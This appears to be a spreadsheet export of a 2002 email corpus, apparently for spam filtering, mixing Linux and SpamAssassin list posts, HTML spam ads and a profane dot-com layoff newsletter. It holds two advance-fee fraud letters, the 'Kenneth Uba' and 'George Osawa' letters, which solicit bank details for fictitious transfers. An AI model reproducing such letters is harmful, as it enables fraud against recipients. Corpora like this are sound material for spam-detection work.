 &lt;p align=3D"left"&gt;&lt;a href=3D"http://freesite002.friendly-hosting.com"&gt;&lt;fon=
 t face=3D"Arial"&gt;&lt;b&gt;Visit
 Our Web Site and Learn The Facts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;br=
 &gt;
 ------------------------------------------&lt;BR&gt;
 &lt;a href=3D"mailto:outmail@btamail.net.cn"&gt;&lt;font size=3D"3"&gt;Click Here to b=
 e Un-Subscribe!&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 ------------------------------------------
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] VPN implementation
</t>
  </si>
  <si>
    <t xml:space="preserve">On September 2, kialllists@redpie.com said:
 &gt; OS-X is linux
 &gt; 
 Er, no it's not. It's kinda BSD-related, but it's definitely not
 Linux.
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me.
 "Since I am project leader, I must not be permitted to go insane."
                                                                 - Theo de Radt
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] [OT] SpamAssassin figures...
</t>
  </si>
  <si>
    <t xml:space="preserve">sorry for the dupe.. thought the com address would bounce.. my bad.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</si>
  <si>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&gt; [Guido]
 &gt; &gt; Perhaps more useful would be if Tim could check in the pickle(s?)
 &gt; &gt; generated by one of his training runs, so that others can see how
 &gt; &gt; Tim's training data performs against their own corpora.
 [Tim]
 &gt; I did that yesterday, but seems like nobody bit.
 I downloaded and played with it a bit, but had no time to do anything
 systematic.  It correctly recognized a spam that slipped through SA.
 But it also identified as spam everything in my inbox that had any
 MIME structure or HTML parts, and several messages in my saved 'zope
 geeks' list that happened to be using MIME and/or HTML.
 So I guess I'll have to retrain it (yes, you told me so :-).
 &gt; Just in case &lt;wink&gt;, I
 &gt; uploaded a new version just now.  Since MINCOUNT went away, UNKNOWN_SPAMPROB
 &gt; is much less likely, and there's almost nothing that can be pruned away (so
 &gt; the file is about 5x larger now).
 &gt; 
 &gt;     http://sf.net/project/showfiles.php?group_id=61702
 I'll try this when I have time.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2 Oct 2002, Gregory Alan Bolcer wrote:
 --]Elias Sinderson wrote:
 --]&gt; 802.11b - 11Mbps per channel over three channels in the 2.4GHz range
 --]&gt; (also shared with microwaves and cordless phones)
 --]
 --]Microwaves, cordless phones and video-based baby monitors....
 Well I dont have to worry about microwavers in the house. Ours died a week
 or so ago and due to doing some research we will nto be getting anysuch
 device in the near or far future. I mean even if one half of the crap it
 is reported to do is true it s just not worth it for a quick cup or warm
 chai.
 Which brings me to the fact that finding a good Convection only (not combo
 with a microwaver) oven of any good size is dang near impossible unless
 you go up to the bizness sizes. thankfully there is Dehlongi of which
 costco has thru thier online store.
 Now of course the question is do we get it delivered to the old house or
 the new one (yep we got our offer approved and are in the short run down
 to a long mortage:)  we close on oct 31. though the realestate agent says
 t happens like that a lot, I still find it incrediably jolting to have
 found a house inthe hood I want with the space dawn wants on sunday and we
 are signing papers on tuesday night with a close at the end of the month.
 Which of course means....wifi land for wsmf:)- )
 So far I like the Linksys dsl/cable router all in one wifi ap. The Dlink
 has the funky 22mb stuff IF you use all thier stuff across the net and the
 way things go I cant say thats gonna happen for sure. Pluse the Linksys
 stuff is all over the mass market sotres so I cna walk home with parts at
 any time.
 The fun now comes with a realization that with ATTbi cable as my main hose
 tot he net offering up bwf might be a tad problematic....So i am thinking
 of ways around/through/under that. the setup of the particualrs are far
 form set in stone...any ideas would be welcome.
 Also any portlanders.....party time.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Fw: Re: When are we going to get. [making ALSA rpms]
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, ""Angles" wrote :
 &gt; FYI, This is how I make my ALSA rpms ... some people on the (null) list
 &gt; did not realize it was pretty easy.
 Thanks Angles! I really think I'll give ALSA a shot fairly soon then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</si>
  <si>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Grow Up And Be A Man! abm
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="http://www.sld.bizhosting.com"&gt;Click Here
 &lt;p/&gt;
 hwawrlgiooooqvjoii
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the Desk of Mr. Kenneth Uba
 Union Bank of Nigeria,
 Lagos-Nigeria.
 ATTN: THE PRESIDENT/C.E.O
 STRICTLY A PRIVATE BUSINESS PROPOSAL
 Dear Sir,
 I am Mr. Kenneth Uba, the manager bills and exchange
 at the Foreign Remittance Department of the Union Bank of Nigeria Plc. 
 I am writing this letter to ask for your support and
 cooperation to carry out this business opportunity in my department. 
 We discovered an abandoned sum of $31,000,000.00 (Thirty One million United States Dollars only) in an account that belongs to one of our foreign customers who died along with his entire family of a wife and two children in November 1997 in a Plane crash.
 Since we heard of his death, we have been expecting his next-of-kin to come over and put claims for his money as the heir, because we cannot release the fund from his account unless someone applies for claim as
 the next-of-kin to the deceased as indicated in our banking guidelines.
 Unfortunately, neither their family member nor distant relative has ever appeared to claim the said fund. 
 Upon this discovery, I and other officials in my department have agreed to make business with you and release the total amount into your account as the heir of the fund since no one came for it or discovered he maintained account with our bank, otherwise the fund will be returned to the bank's treasury as unclaimed fund.
 We have agreed that our ratio of sharing will be as stated thus; 
 20 % for you as foreign partner, 75 % for us the officials in my department and 5 % for the settlement of all local and foreign expenses incurred by us and you during the course of this business.
 Upon the successful completion of this transfer, I and one of my colleagues will come to your country and mind our share. It is from our 75 % we intend to import Agricultural machineries into my country as a way of recycling the fund.  
 To commence this transaction, we require you to immediately indicate your interest by a return e-mail and enclose your private contact telephone number, fax number full name and address and your designated
 bank coordinates to enable us file letter of claim to the appropriate departments for necessary approvals before the transfer can be made.
 Note also, this transaction must be kept STRICTLY CONFIDENTIAL because of its nature. 
 I look forward to receiving your prompt response.
 Mr. Kenneth Uba
 Union Bank of Nigeria.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] From the desk of : George Osawa
</t>
  </si>
  <si>
    <t xml:space="preserve">NIGERIA ELECTIRC POWER AUTHORITY 
 FEDERAL SECRETARIAT 
 IKOYI-LAGOS.
 FROM THE DESK OF:George Osawa
 I am the Chairman Contract Review Committee of National 
 Electric Power Authority (NEPA). 
 Although this 
 proposal might come to you as a surprise since it is 
 coming from someone you do not know 
 or ever seen
 before, but after due deliberations with my colleagues, I 
 decided to contact you based on 
 Intuition. 
 We are soliciting for your humble and confidential 
 assistance to take custody of Seventy-
 One Million,
 Five Hundred Thousand United States 
 Dollars.{US$71,500,000.00}. This sum 
 (US$71.5M) is an over 
 invoice contract sum which is currently in an offshore 
 payment account of the Central Bank 
 of Nigeria as an 
 unclaimed contract entitlement which can easily be 
 withdrawn or drafted or pay to any 
 recommended 
 beneficiary by my committee.
 On this note, you will be presented as a contractor to 
 NEPA who has executed a contract 
 to a tune of the
 above sum and has not been paid. 
 Proposed Sharing Partern (%): 
 1. 70% for me and my colleagues. 
 2. 20% for you as a partner/fronting for us.
 3. 10% for expenses that may be incurred by both parties 
 during the cause of this 
 transacton.
 Our law prohibits a civil servant from operating a 
 foreign account, hence we are contacting 
 you. If this
 proposal satisfies you, do respon as soon as possible 
 with the following information: 
 1. The name you wish to use as the beneficiary of the 
 fund. 
 2. Your Confidential Phone and Fax Numbers. 
 Further discussion will be centered on how the fund shall 
 be transfer and full details on how 
 to accomplish this 
 great opportunity of ours.
 Thank you and God bless. 
 Best regards, 
 George Osawa 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: central management
</t>
  </si>
  <si>
    <t xml:space="preserve">I build a lot of rpms but I'm to stupid/busy to "apt-ize" what I have. I wish
 it was apt enabled because I have several boxen and apt would help even with
 rpms that I build. Did I mention forgetful too?
 http://www.dudex.net/rpms
 che (che666@uni.de) wrote*:
 &gt;
 &gt;hello!
 &gt;well in my eyes something like a public contrib repository would be nice
 (where everyone can at least upload spec files) and a something like a
 "repository directory" with a collection of available repositorys and their
 content.
 &gt;
 &gt;i am personally on a dsl dialup connection with 16kb/s upstream cap and that
 kinda sucks perhaps i am gonna still create a respository for small
 windowmaker dockapps in the future :).
 &gt;
 &gt;what do you think?
 &gt;
 &gt;thanks,
 &gt;che
 &gt;
 &gt;_______________________________________________
 &gt;RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt;
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Indeed - I was thinking of getting back into doing mods - nice to see an 
 apt-get'able soundtracker there :-)
 Anyone know where to get a good selection of samples/loops?
 --On Monday, September 30, 2002 07:14:31 +0000 Angles Puglisi 
 &lt;angles@aminvestments.com&gt; wrote:
 &gt; _Very_ comprehensive audio app collection, Thanks.
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FC Sporadic for Wednesday, October 30, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --= Multipart Boundary 1030021620
 Content-Type: text/plain;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 &lt;head&gt;
 &lt;title&gt;FC Sporadic&lt;/title&gt;
 &lt;style&gt;
 TABLE.subtable { 
 	border-right: solid 1px #000000;
 	border-bottom: solid 1px #000000;
 	border-left: solid 1px #000000;
 	border-top: solid 1px #000000;
 	background: #ffffcc;
 }
 .headline {font-family: Verdana, Geneva, Arial; font-size:9pt; color:000000; font-weight:bold}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=ffffff link=0000ff alink=0000ff vlink=0000ff&gt;
 &lt;font size=2 face=verdana,arial&gt;Hi,&lt;br&gt;
 &lt;table align="right" border=0 class=subtable width=270&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 		&lt;font size=1 face=verdana,arial&gt;Check out my new site,&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/ target=_blank&gt;&lt;font size=+1 color=blue&gt;&lt;b&gt;&lt;span style="text-decoration:none;"&gt;InternalMemos.com&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 		&lt;br&gt;
 		Over 980 internal memos, updated daily.
 		&lt;br&gt;
 		Recent highlights include:  
 		&lt;p&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1026&gt;A&amp;P: Salary, hiring freeze&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1019&gt;Exodus: Rumors, rumors, rumors&lt;/a&gt;&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1021&gt;MSNBC: Sniper, parties, other news&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1015&gt;Ebay: San Jose office moving?&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1020&gt;EDS: Incentive &amp; bonus changes&lt;/a&gt;&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1002&gt;Adobe: Workforce Realignment/Reduction&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1001&gt;Lycos: Frank Weller resignation&lt;/a&gt;&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1009&gt;AOL: Past, present, and future&lt;/a&gt;&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=993&gt;TenFold: Reorganization&lt;/a&gt;&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1008&gt;Ebay: Meg addresses allegations&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt; &lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=987&gt;Verisign: Third-party phase-out&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt; &lt;a href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=955&gt;Ericsson: Market unstable, moving on&lt;/a&gt;
 &lt;P&gt;
 &lt;a href=http://www.internalmemos.com/&gt;More internal memos...&lt;/a&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 Let me first welcome all the new people to the Sporadic -- there were a bunch of people who signed up a while ago but never got added until today, I think the problems have been fixed.  There are currently over 250,000 subscribers to this 
 list (dayam!).  Of those, I think there are around 5 people who actually read it.&lt;br&gt;
 &lt;br&gt;
 So anyway, raise your hand if you're older than 30 and have never been married.  &lt;br&gt;
 &lt;br&gt;
 Unless I meet the girl of my dreams tomorrow (which is unlikely as I don't plan on leaving my apartment tomorrow, much less wearing pants anytime in the near future), looks like I'm headed in that direction.&lt;br&gt;
 &lt;br&gt;
 I never think about it but it seems I'm supposed to.  I definitely don't want to be one of those guys who's a bachelor for life, and I eventually want kids, I think that's cool!  But today, October 30, 2002, is my 27th birthday.&lt;br&gt;
 &lt;br&gt;
 To celebrate, I bought myself some Rogain, tooth whitener, and a gym membership.  My detergent makes the skin on my back hurt and I still have zits.  Oh hey I bought a new guitar and &lt;a target=_blank 
 href=http://www.beefsavage.com/&gt;played dress up&lt;/a&gt;, that was fun.&lt;br&gt;
 &lt;br&gt;
 It's 4:00 AM and I'm eating expired ham.  Somehow I'm able to write a newsletter to 250,000 people, yet my birthday plans involve sitting home alone teaching myself Journey songs on the guitar.  then Blockbuster and Chinese delivery.  
 Woohoo!  &lt;br&gt;
 &lt;br&gt;
 Anyway, thanks for being there. &lt;br&gt;
 &lt;br&gt;
 Rock on,&lt;br&gt;
 pud&lt;br&gt;
 &lt;br&gt;
 ps- man, this new Sporadic layout is a little too cheery, don't you think?  blah, i'll fix it later.&lt;br&gt;_x000b_ 
 pps- if you need web hosting or are a hosting provider, check out my new site &lt;a target=_blank href=http://www.bizient.com/&gt;Bizient.com&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;hr noshade size=1&gt;&lt;br&gt;
 Here are some of today's newest fucks.  As usual, more new ones on the site daily.&lt;br&gt;
 &lt;a target=_blank href=http://www.fuckedcompany.com/&gt;http://www.fuckedcompany.com/&lt;/a&gt;
 &lt;p&gt;
 &lt;span class="headline"&gt;Booyah&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Wowwwww..... &lt;a href=http://www.internalmemos.com:8080/memos/memodetails.php?memo_id=1027&gt;this internal memo&lt;/a&gt; sent to Clifford 
 Chance LLP employees lists a ton of "problem areas", complaints and comments... Highlights include, "If the assigning system isn't corrupt, ask yourself: why aren't attractive female associates ever out of work?" and "Not only is he 
 dishonest, but he behaves completely inappropriately with female associates working under him".. and so on.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Clifford Chance LLP&lt;br&gt;
 							Points: 135&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Grrr&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Vignette to Acquire Epicentric.  Here's the &lt;a target=_blank href=http://biz.yahoo.com/prnews/021029/datu058_1.html&gt;news&lt;/a&gt;, and of 
 course here's the &lt;a href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1025&gt;internal memo&lt;/a&gt; that was sent to employees.  From one FC reader and pissed-off employee who worked hard for his options, "Here's 
 my favorite one.  Q. What will happen to my Epicentric employee stock options?
 A.  Once the purchase of Epicentric is complete, Epicentric stock options will be cancelled."&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Epicentric&lt;br&gt;
 							Points: 185&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Limb&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Bausch and Lomb CEO &lt;a target=_blank href=http://biz.yahoo.com/rb/021029/health_bauschandlomb_1.html&gt;denied&lt;/a&gt; $1.1 million bonus 
 for falsely claiming to have completed a masters degree.  What a fuckbasket cock-socket he is.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Bausch &amp; Lomb &lt;A
 HREF="javascript:popUp('profile.cfm?newsID=95027')"&gt;&lt;img border=0
 src=http://www.fuckedcompany.com/images/profile.gif align=middle alt="Profile"&gt;&lt;/a&gt;&lt;br&gt;
 							Points: 115&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Cleanup, isle four&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Salary and hiring freeze at &lt;a target=_blank href=http://www.aptea.com/&gt;A&amp;P&lt;/a&gt; supermarkets, here's the &lt;a 
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1026&gt;internal memo&lt;/a&gt; sent to employees.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: A&amp;P&lt;br&gt;
 							Points: 120&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;CyaNow&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Okee I reported yesterday that &lt;a target=_blank href=http://www.cdnow.com/&gt;CDNow&lt;/a&gt; was set to layoff 60 people... well rumor has it the 
 axe just fell and the *entire* programming staff was let go.  Whether this means the company is shutting down or they're just being replaced by cheaper consultants remains to be seen...&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: CdNow&lt;br&gt;
 							Points: 169&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Sore&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Rumor has it &lt;a target=_blank href=http://www.kestrelsolutions.com/&gt;Kestrel Solutions&lt;/a&gt; filed Chapter 11 today.  Anyone need a sweet deal 
 on a bit-rate independent multiplexer?  uhh.. didnt think so.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Kestrel Solutions&lt;br&gt;
 							Points: 165&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;XXX&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Rumor has it massive layoffs in the pipline at &lt;a target=_blank href=http://www.xerox.com/&gt;Xerox&lt;/a&gt;.  Word is high-ranking managers are 
 having assignments removed, work load reduced, etc... Sometime mid-next week is said to be d-day. &lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Xerox &lt;A
 HREF="javascript:popUp('profile.cfm?newsID=95035')"&gt;&lt;img border=0
 src=http://www.fuckedcompany.com/images/profile.gif align=middle alt="Profile"&gt;&lt;/a&gt;&lt;br&gt;
 							Points: 143&lt;br&gt;
 &lt;br&gt;
 Copyright 2002.  too tired to think of anything creative.  thanks for reading tho :)
 &lt;/font&gt;
 &lt;/body&gt; 
 --= Multipart Boundary 1030021620
 Content-Type: text/html;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 &lt;head&gt;
 &lt;title&gt;FC Sporadic&lt;/title&gt;
 &lt;style&gt;
 TABLE.subtable { 
 	border-right: solid 1px #000000;
 	border-bottom: solid 1px #000000;
 	border-left: solid 1px #000000;
 	border-top: solid 1px #000000;
 	background: #ffffcc;
 }
 .headline {font-family: Verdana, Geneva, Arial; font-size:9pt;
 color:000000; font-weight:bold}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor=ffffff link=0000ff alink=0000ff vlink=0000ff&gt;
 &lt;font size=2 face=verdana,arial&gt;Hi,&lt;br&gt;
 &lt;table align="right" border=0 class=subtable width=270&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 		&lt;font size=1 face=verdana,arial&gt;Check out my new site,&lt;br&gt;
 		&lt;a href=http://www.internalmemos.com/ target=_blank&gt;&lt;font size=+1
 color=blue&gt;&lt;b&gt;&lt;span
 style="text-decoration:none;"&gt;InternalMemos.com&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 		&lt;br&gt;
 		Over 980 internal memos, updated daily.
 		&lt;br&gt;
 		Recent highlights include:  
 		&lt;p&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1026&gt;A&amp;P:
 Salary, hiring freeze&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1019&gt;Exodus:
 Rumors, rumors, rumors&lt;/a&gt;&lt;br&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1021&gt;MSNBC: 
 Sniper, parties, other news&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1015&gt;Ebay:
 San Jose office moving?&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1020&gt;EDS:
 Incentive &amp; bonus changes&lt;/a&gt;&lt;br&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1002&gt;Adobe: 
 Workforce Realignment/Reduction&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt;&lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=1001&gt;Lycos:
 Frank Weller resignation&lt;/a&gt;&lt;br&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1009&gt;AOL:
 Past, present, and future&lt;/a&gt;&lt;br&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=993&gt;TenFold:
  Reorganization&lt;/a&gt;&lt;br&gt;
 		&lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1008&gt;Ebay:
 Meg addresses allegations&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt; &lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=987&gt;Verisign: 
 Third-party phase-out&lt;/a&gt;&lt;br&gt;
 		&lt;font size=1 color=green&gt;&lt;b&gt;$&lt;/b&gt;&lt;/font&gt; &lt;a
 href=http://www.kaplanindex.com/memos/memodetails.php?memo_id=955&gt;Ericsson: 
 Market unstable, moving on&lt;/a&gt;
 &lt;P&gt;
 &lt;a href=http://www.internalmemos.com/&gt;More internal memos...&lt;/a&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 Let me first welcome all the new people to the Sporadic -- there were a
 bunch of people who signed up a while ago but never got added until today,
 I think the problems have been fixed.  There are currently over 250,000
 subscribers to this 
 list (dayam!).  Of those, I think there are around 5 people who actually
 read it.&lt;br&gt;
 &lt;br&gt;
 So anyway, raise your hand if you're older than 30 and have never been
 married.  &lt;br&gt;
 &lt;br&gt;
 Unless I meet the girl of my dreams tomorrow (which is unlikely as I don't
 plan on leaving my apartment tomorrow, much less wearing pants anytime in
 the near future), looks like I'm headed in that direction.&lt;br&gt;
 &lt;br&gt;
 I never think about it but it seems I'm supposed to.  I definitely don't
 want to be one of those guys who's a bachelor for life, and I eventually
 want kids, I think that's cool!  But today, October 30, 2002, is my 27th
 birthday.&lt;br&gt;
 &lt;br&gt;
 To celebrate, I bought myself some Rogain, tooth whitener, and a gym
 membership.  My detergent makes the skin on my back hurt and I still have
 zits.  Oh hey I bought a new guitar and &lt;a target=_blank 
 href=http://www.beefsavage.com/&gt;played dress up&lt;/a&gt;, that was fun.&lt;br&gt;
 &lt;br&gt;
 It's 4:00 AM and I'm eating expired ham.  Somehow I'm able to write a
 newsletter to 250,000 people, yet my birthday plans involve sitting home
 alone teaching myself Journey songs on the guitar.  then Blockbuster and
 Chinese delivery.  
 Woohoo!  &lt;br&gt;
 &lt;br&gt;
 Anyway, thanks for being there. &lt;br&gt;
 &lt;br&gt;
 Rock on,&lt;br&gt;
 pud&lt;br&gt;
 &lt;br&gt;
 ps- man, this new Sporadic layout is a little too cheery, don't you think?
  blah, i'll fix it later.&lt;br&gt;_x000b_ 
 pps- if you need web hosting or are a hosting provider, check out my new
 site &lt;a target=_blank href=http://www.bizient.com/&gt;Bizient.com&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;hr noshade size=1&gt;&lt;br&gt;
 Here are some of today's newest fucks.  As usual, more new ones on the
 site daily.&lt;br&gt;
 &lt;a target=_blank
 href=http://www.fuckedcompany.com/&gt;http://www.fuckedcompany.com/&lt;/a&gt;
 &lt;p&gt;
 &lt;span class="headline"&gt;Booyah&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Wowwwww..... &lt;a
 href=http://www.internalmemos.com:8080/memos/memodetails.php?memo_id=1027&gt;th
 is internal memo&lt;/a&gt; sent to Clifford 
 Chance LLP employees lists a ton of "problem areas", complaints and
 comments... Highlights include, "If the assigning system isn't corrupt,
 ask yourself: why aren't attractive female associates ever out of work?"
 and "Not only is he 
 dishonest, but he behaves completely inappropriately with female
 associates working under him".. and so on.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Clifford Chance LLP&lt;br&gt;
 							Points: 135&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Grrr&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Vignette to Acquire Epicentric.  Here's the
 &lt;a target=_blank
 href=http://biz.yahoo.com/prnews/021029/datu058_1.html&gt;news&lt;/a&gt;, and of 
 course here's the &lt;a
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1025&gt;interna
 l memo&lt;/a&gt; that was sent to employees.  From one FC reader and pissed-off
 employee who worked hard for his options, "Here's 
 my favorite one.  Q. What will happen to my Epicentric employee stock
 options?
 A.  Once the purchase of Epicentric is complete, Epicentric stock options
 will be cancelled."&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Epicentric&lt;br&gt;
 							Points: 185&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Limb&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Bausch and Lomb CEO &lt;a target=_blank
 href=http://biz.yahoo.com/rb/021029/health_bauschandlomb_1.html&gt;denied&lt;/a&gt;
 $1.1 million bonus 
 for falsely claiming to have completed a masters degree.  What a
 fuckbasket cock-socket he is.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: Bausch &amp; Lomb &lt;A
 HREF="javascript:popUp('profile.cfm?newsID=95027')"&gt;&lt;img border=0
 src=http://www.fuckedcompany.com/images/profile.gif align=middle
 alt="Profile"&gt;&lt;/a&gt;&lt;br&gt;
 							Points: 115&lt;br&gt;
 							&lt;br&gt;&lt;br&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 						&lt;tr&gt;
 							&lt;td&gt;
 							&lt;span class="headline"&gt;Cleanup, isle four&lt;/span&gt;&lt;br&gt;
 							&lt;span class="article"&gt;Salary and hiring freeze at &lt;a target=_blank
 href=http://www.aptea.com/&gt;A&amp;P&lt;/a&gt; supermarkets, here's the &lt;a 
 href=http://www.internalmemos.com/memos/memodetails.php?memo_id=1026&gt;interna
 l memo&lt;/a&gt; sent to employees.&lt;br&gt;
 							When: 10/30/2002&lt;br&gt;
 							Company: A&amp;P&lt;br&gt;
